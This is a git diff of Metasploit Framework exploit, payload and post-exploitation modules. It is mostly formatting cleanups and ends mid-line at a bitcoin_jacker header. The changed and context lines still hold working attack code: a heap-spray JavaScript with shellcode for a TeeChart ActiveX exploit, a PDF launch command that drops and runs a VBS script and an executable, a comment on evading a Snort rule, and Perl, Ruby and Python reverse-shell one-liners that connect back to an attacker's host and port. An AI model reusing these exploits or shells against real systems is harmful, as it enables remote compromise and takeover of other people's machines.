a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index 53d16788f3..dd6b11e877 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -91,7 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b - raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' + raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' + + 'Support for chunked encoded requests was added to PHP on 12/15/2005. ' + + 'Try disabling HTTP::chunked and trying again.' end end end diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 5a1d05ca76..a91307ae0c 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # build the exploit - content = %Q| + content = <<-EOS msf @@ -112,12 +112,13 @@ ID=Abysssec width=600 height=430 VIEWASTEXT> - -| +EOS # Transmit the response to the client path = request.uri diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 83753809a1..bc0e0f8b74 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote ''+ ''; } else { - alert('Internal Error'); + alert('Internal Error'); } | # the ret slide gets executed via call [esi+45b] diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index bfaff87860..da7fef5c78 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -277,7 +277,7 @@ else { custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate() end - return %Q| + return <<-EOS
@@ -291,7 +291,7 @@ else { - | +EOS end diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index e319b5b2e8..e17fd622bd 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote )) end - def junk - return rand_text_alpha(4).unpack("L")[0].to_i - end + def junk + return rand_text_alpha(4).unpack("L")[0].to_i + end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index a3d8fe5d22..6bb3bce634 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote end dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll" - html = %Q| + html = <<-EOS + - - - EOF + content = <<-EOS + + + + + + +EOS #Remove the extra tabs from content content = content.gsub(/^\t\t/, '') diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index 9d59cb8c9b..dc7058e5fe 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote # twitter.com/net__ninja 'mr_me ', # initial discovery/msf module 'sinn3r', #Auto target, obfuscation, lots of testing - ], + ], 'Version' => '$Revision$', 'References' => [ @@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote main_sym = 'main' #main function name if my_target.name =~ /IE6/ or my_target.name =~ /IE7/ - js = <<-EOF - var sc = unescape('#{sc}'); + js = <<-EOS +var sc = unescape('#{sc}'); - var nops = unescape('%u0c0c%u0c0c'); - var offset = 20; - var s = offset + sc.length; - while(nops.length < s) { - nops += nops; - } - var chunk1 = nops.substring(0, s); - var chunk2 = nops.substring(0, nops.length - s); - while((chunk2.length + s) < 0x50000) { - chunk2 = chunk2 + chunk2 + chunk1; - } - var blocks = new Array(); - for(var counter=0; counter<200; counter++){ - blocks[counter] = chunk2 + sc; - } +var nops = unescape('%u0c0c%u0c0c'); +var offset = 20; +var s = offset + sc.length; +while(nops.length < s) { + nops += nops; +} +var chunk1 = nops.substring(0, s); +var chunk2 = nops.substring(0, nops.length - s); +while((chunk2.length + s) < 0x50000) { + chunk2 = chunk2 + chunk2 + chunk1; +} +var blocks = new Array(); +for(var counter=0; counter<200; counter++){ + blocks[counter] = chunk2 + sc; +} - function main() - { - #{obj_name}.AddSeries(#{my_target.ret}); - } - EOF +function main() +{ + #{obj_name}.AddSeries(#{my_target.ret}); +} +EOS end #http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 46a15b3073..4ab6491b54 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote def create_email_body_html(body, subject) body = body.gsub(/\\[nr]/, "
\n") body = body.gsub(/\\t/, "   ") - body = "\n\n\n\n" << subject << "\n\n\n" << body << "\n

\n\n" - return body + ret = "\n\n\n\n" + ret << "" << subject << "\n\n\n" << body << "\n

\n\n" + ret end def create_tnef_exploit diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 0c7dfc6f2d..13abefbcf0 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote end def make_xml(tiff_data) - xml_data = %Q| + xml_data = <<-EOS + @@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote -| +EOS xml_data.gsub!(/REPLACE_TIFF/, tiff_data) xml_data diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 765199bdc6..207efa9889 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote output = String.new() output << "#{obj_num.to_i + 1} 0 obj\r<>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r" - output << "#{obj_num.to_i + 2} 0 obj\r<>>>>stream\r#{stream}\r\nendstream\rendobj\r" - + output << "#{obj_num.to_i + 2} 0 obj\r<>>>>" + output << "stream\r#{stream}\r\nendstream\rendobj\r" return output end diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 9a08f08c92..78e1e2e984 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote xref << pdf.length pdf << ioDef(5) << nObfu("< 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs" pdf << eol << eol << eol << "#{launch_msg})" pdf << ">>>>" << endobj diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index edd7ff41c5..37c7abfffb 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - template = <<-EOF + template = <<-EOS @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote -EOF +EOS seh_offset = 272 path = make_nops(seh_offset) diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb old mode 100755 new mode 100644 diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index aba9f1f36d..cfc90c64fa 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.exploit-db.com/exploits/8180' ], [ 'URL', 'http://www.exploit-db.com/exploits/12059/' ], ], - 'Platform' => [ 'win' ], - 'Payload' => + 'Platform' => [ 'win' ], + 'Payload' => { 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, }, @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), OptString.new('USERNAME', [ true, 'Username', '']) ], self.class) @@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions) [ 'x86/alpha_mixed'].each { |name| - enc = framework.encoders.create(name) - if name =~/alpha/ - enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) - end + enc = framework.encoders.create(name) + if name =~/alpha/ + enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) + end hunter = enc.encode(hunter, nil, nil, platform) } diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 904f2ec955..c6b39275a8 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\ decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs') return decoder = Rex::Text.uri_encode(decoder) - end + end end diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 74a4eebbbc..158f1c3dab 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.scadatec.com/' ], [ 'URL', 'http://www.exploit-db.com/exploits/17817/' ], ], - 'Platform' => [ 'win' ], - 'Payload' => + 'Platform' => [ 'win' ], + 'Payload' => { 'Space' => 700, 'BadChars' => "\x00\x0a\x0d", @@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ - OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), - ], self.class) - + [ + OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']), + ], self.class) end def exploit diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 6af49766f3..fef83c5f34 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -9,11 +9,11 @@ # http://metasploit.com/framework/ ## -## +=begin # This should bypass the following snort rule referenced from web-misc.rules (10/17/2008) # alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;) # Newer versions of this rule might find this but we've taken steps to atleast bypass this rule -## +=end require 'msf/core' @@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(7510), - OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ]) + OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", + 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ]) ], self.class) end diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index 60dec780e5..26fb75f5d4 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote which may result aribitrary remote code execution under the context of 'SYSTEM'. }, 'License' => MSF_LICENSE, - 'Author' => + 'Author' => [ # Original discovery (Secunia Research) 'Alin Rad Pop', diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 8e94cdce9f..4f7025640d 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end end + __END__ else if (strcmp($type, "Job") == 0) { diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 5bc3a7c21d..f605077d09 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending malicious packet") open_pcap() - - #handler + #handler if datastore['LOOP'] while true break if session_created? and datastore['ExitOnSession'] diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb old mode 100755 new mode 100644 index c750ba303b..9f5708f315 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 3f32ace328..004f5b0b13 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' module Metasploit3 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index bb43d07c12..87abc8d704 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index fdc98a33ec..b5c4bfc05d 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index e4b5dabd80..6c400da7f4 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::Exec end diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index 7240378021..d306a93937 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::LoadLibrary end diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index fe7354800e..7b84375422 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -20,7 +20,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Java Reverse HTTPS Stager', - 'Version' => '$Revision: 13402 $', + 'Version' => '$Revision$', 'Description' => 'Tunnel communication over HTTPS', 'Author' => [ 'mihi', # all the hard work diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index ee0e8285d5..fc4e3fb6dd 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/bind_tcp' diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index 36fb62eda0..a2be9a7899 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/core/handler/reverse_tcp' diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index f71eda8be5..8770ac00e4 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -1,3 +1,15 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 47daaaf731..e001b8a48b 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Osx::BundleInject end diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 6a3b68cfcd..c181777f9e 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::ReflectiveDllInject end diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index fea3e648a1..945f5e168d 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject' ### module Metasploit3 + # $Revision$ include Msf::Payload::Windows::DllInject end diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 9db94f2341..2b6e0b634a 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Multi Gather DNS Forward Lookup Bruteforce', - 'Description' => %q{ + 'Description' => %q{ Brute force subdomains and hostnames via wordlist. }, 'License' => MSF_LICENSE, @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post # Run Method for when run command is issued def run - + domain = datastore['DOMAIN'] hostlst = datastore['NAMELIST'] i, a = 0, [] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post ns_opt = " #{n.strip}.#{domain}" cmd = "/usr/bin/host" end - + if i <= thread_num print_status("Trying #{ns_opt}") a.push(::Thread.new { @@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post end end end -end \ No newline at end of file +end diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 145dbe607b..10c29689f6 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, 'Name' => 'Multi Gather DNS Service Record Lookup Scan', - 'Description' => %q{ + 'Description' => %q{ Enumerates know SRV Records for a given domaon using target host DNS query tool. }, 'License' => MSF_LICENSE, @@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post # Run Method for when run command is issued def run srvrcd = [ - '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', - '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', - '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', - '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', - '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', - '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', - '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', - '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', - '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', - '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', - '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', - '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', - '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', - '_ldap._tcp.ForestDNSZones.' - ] + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.' + ] domain = datastore['DOMAIN'] @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post ip_map[host.strip] = ip.strip end end - + # Get SRV parameter for each record records.each do |r| if r =~ /svr hostname/ @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post srv_records << rcrd end else - + rcrd[:ip] = ip_map[rcrd[:target]] # Report hosts found report_host(:host => rcrd[:ip].strip, :name => rcrd[:target]) @@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post end return srv_records end -end \ No newline at end of file +end diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1dd5850655..0ceb73b4d5 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post numip = ipadd.num_ips while (iplst.length < numip) ipa = ipadd.next_ip - if (not ipa) - break - end + if (not ipa) + break + end iplst << ipa end if session.type =~ /shell/ diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 4aef47414c..2b6a4177ad 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post [false, 'Port for Payload to connect to.', 4433]), OptBool.new('HANDLER', [ true, 'Start an Exploit Multi Handler to receive the connection', false]), - OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\ - 'auto', ['auto','ruby','python','perl','bash']]) + OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell', + 'auto', ['auto','ruby','python','perl','bash']]) ], self.class) end @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post lport = datastore['LPORT'] cmd = "" case datastore['type'] - when /auto/i + when /auto/i cmd = auto_create_session(lhost,lport) when /ruby/i cmd = ruby_session(lhost,lport) @@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post def perl_session(lhost,lport) if cmd_exec("perl -v") =~ /Larry/ print_status("Perl reverse shell selected") - cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \ -(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" + cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " + + "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" else print_error("No scripting environment found for the selected type.") cmd ="" @@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post def ruby_session(lhost,lport) if cmd_exec("ruby -v") =~ /revision/i print_status("Ruby reverse shell selected") - return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\ -while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'" + return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" + + "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'" else print_error("No scripting environment found for the selected type.") cmd ="" @@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end' def python_session(lhost,lport) if cmd_exec("python -V") =~ /Python 2\.(\d)/ print_status("Python reverse shell selected") - return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\ -socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\ -os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," + + "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" + + "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" else print_error("No scripting environment found for the selected type.") cmd ="" @@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" end return cmd end -end \ No newline at end of file +end diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb index 327261fdd4..c3872e1c22 100644 --- a/modules/post/windows/gather/arp_scanner.rb +++ b/modules/post/windows/gather/arp_scanner.rb @@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post ip = h["return"] h = iphlp.SendARP(ip,0,6,6) if h["return"] == client.railgun.const("NO_ERROR") - mac = h["pMacAddr"] - mac_text = mac[0].ord.to_s(16) + ":" + - mac[1].ord.to_s(16) + ":" + - mac[2].ord.to_s(16) + ":" + - mac[3].ord.to_s(16) + ":" + - mac[4].ord.to_s(16) + ":" + - mac[5].ord.to_s(16) + mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':') print_status("\tIP: #{ip_text} MAC #{mac_text}") report_host(:host => ip_text,:mac => mac_text) end diff --git a/modules/post/windows/gather/bitcoin_jacker.rb 